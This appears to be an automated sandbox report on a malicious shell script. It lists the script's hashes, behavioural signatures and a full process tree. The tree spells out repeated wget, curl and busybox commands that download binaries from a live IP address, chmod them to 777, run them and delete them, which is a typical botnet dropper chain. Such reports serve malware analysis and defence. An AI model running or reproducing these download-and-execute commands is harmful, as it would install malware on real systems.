Analysis
-
max time kernel
34s -
max time network
35s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/10/2024, 01:30
Static task
static1
Behavioral task
behavioral1
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh
-
Size
10KB
-
MD5
bd77f6652549a8b0545e6296982a1ac8
-
SHA1
1b2fba63b17d3b1b6408006f4fd88c0774f434ce
-
SHA256
9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b
-
SHA512
7953842db2ac9405140c5484229617b419a3e7e708089c0874dc8093818df33a1c9021685315fbdd46912ffb2291530bd1a9e73449a415ba718b6d6143a1059d
-
SSDEEP
96:50UpzQs+B+82C/GGSF5iRBuYQohM93Y69bY+2C/GGZkF5iRBtpKEjQoxMVUm0UpM:zuB+TwK3yxuJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 25 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 753 chmod 771 chmod 795 chmod 868 chmod 892 chmod 898 chmod 874 chmod 721 chmod 777 chmod 783 chmod 789 chmod 839 chmod 845 chmod 859 chmod 880 chmod 807 chmod 851 chmod 886 chmod 759 chmod 765 chmod 801 chmod 813 chmod 819 chmod 825 chmod 831 chmod -
Executes dropped EXE 25 IoCs
ioc pid Process /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA 723 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz 754 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb 760 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S 766 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly 772 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m 778 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp 784 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ 790 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq 796 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N 802 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj 808 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp 814 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 820 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT 826 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly 832 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m 840 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 846 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT 852 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp 860 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ 869 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq 875 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N 881 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj 887 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp 893 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S 899 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S -
Checks CPU configuration 1 TTPs 25 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 816 wget 821 rm 843 curl 844 busybox 817 curl 818 busybox 820 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 842 wget 846 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 847 rm -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ curl File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp curl File opened for modification /tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA curl File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly curl File opened for modification /tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ curl File opened for modification /tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly curl File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj curl File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S curl File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N curl File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT curl File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m curl File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 curl File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp curl File opened for modification /tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N curl File opened for modification /tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz curl File opened for modification /tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m curl File opened for modification /tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp curl File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq curl File opened for modification /tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67 curl File opened for modification /tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT curl File opened for modification /tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq curl File opened for modification /tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb curl File opened for modification /tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S curl File opened for modification /tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj curl File opened for modification /tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp curl
Processes
-
/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh/tmp/9269b23681aa621799bf65d165337d63101804bfb715857b2d462a891fc14c2b.sh1⤵PID:638
-
/bin/rm/bin/rm bins.sh2⤵PID:640
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:643
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:670
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:684
-
-
/bin/chmodchmod 777 RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- File and Directory Permissions Modification
PID:721
-
-
/tmp/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA./RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵
- Executes dropped EXE
PID:723
-
-
/bin/rmrm RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:724
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:726
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:746
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:751
-
-
/bin/chmodchmod 777 zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/zunJs37CUY2h9nRreComkTdOAsAvGJSgPz./zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm zunJs37CUY2h9nRreComkTdOAsAvGJSgPz2⤵PID:755
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:758
-
-
/bin/chmodchmod 777 OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb./OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm OVudGw5XYPvaJxIUm5n9MWPvpkf5PrzGbb2⤵PID:761
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:762
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:764
-
-
/bin/chmodchmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Executes dropped EXE
PID:766
-
-
/bin/rmrm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:767
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:768
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:770
-
-
/bin/chmodchmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:773
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:774
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:776
-
-
/bin/chmodchmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Executes dropped EXE
PID:778
-
-
/bin/rmrm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:779
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:780
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:782
-
-
/bin/chmodchmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:785
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:786
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:787
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:788
-
-
/bin/chmodchmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- File and Directory Permissions Modification
PID:789
-
-
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Executes dropped EXE
PID:790
-
-
/bin/rmrm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:791
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:792
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:793
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:794
-
-
/bin/chmodchmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:798
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:800
-
-
/bin/chmodchmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:803
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:804
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:806
-
-
/bin/chmodchmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:809
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:811
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:812
-
-
/bin/chmodchmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:815
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:816
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:818
-
-
/bin/chmodchmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:820
-
-
/bin/rmrm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:821
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:824
-
-
/bin/chmodchmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:830
-
-
/bin/chmodchmod 777 pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly./pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm pTsTxtJ2gG7rL1HNkdGENveMF5FHLUa4Ly2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:834
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:838
-
-
/bin/chmodchmod 777 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m./2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm 2uDnnnFKFrqFOZGkDLBLJc0aGvW2F4xZ9m2⤵PID:841
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:842
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:843
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:844
-
-
/bin/chmodchmod 777 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA67./271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:846
-
-
/bin/rmrm 271NBDtmDEAxLCLxI0aJMIEIP9fiAUxA672⤵
- System Network Configuration Discovery
PID:847
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:848
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:850
-
-
/bin/chmodchmod 777 xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT./xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm xrbkix2b5dgFVZjWHGp6R6VOZjCs8833LT2⤵PID:853
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:854
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:856
-
-
/bin/chmodchmod 777 Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp./Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵
- Executes dropped EXE
PID:860
-
-
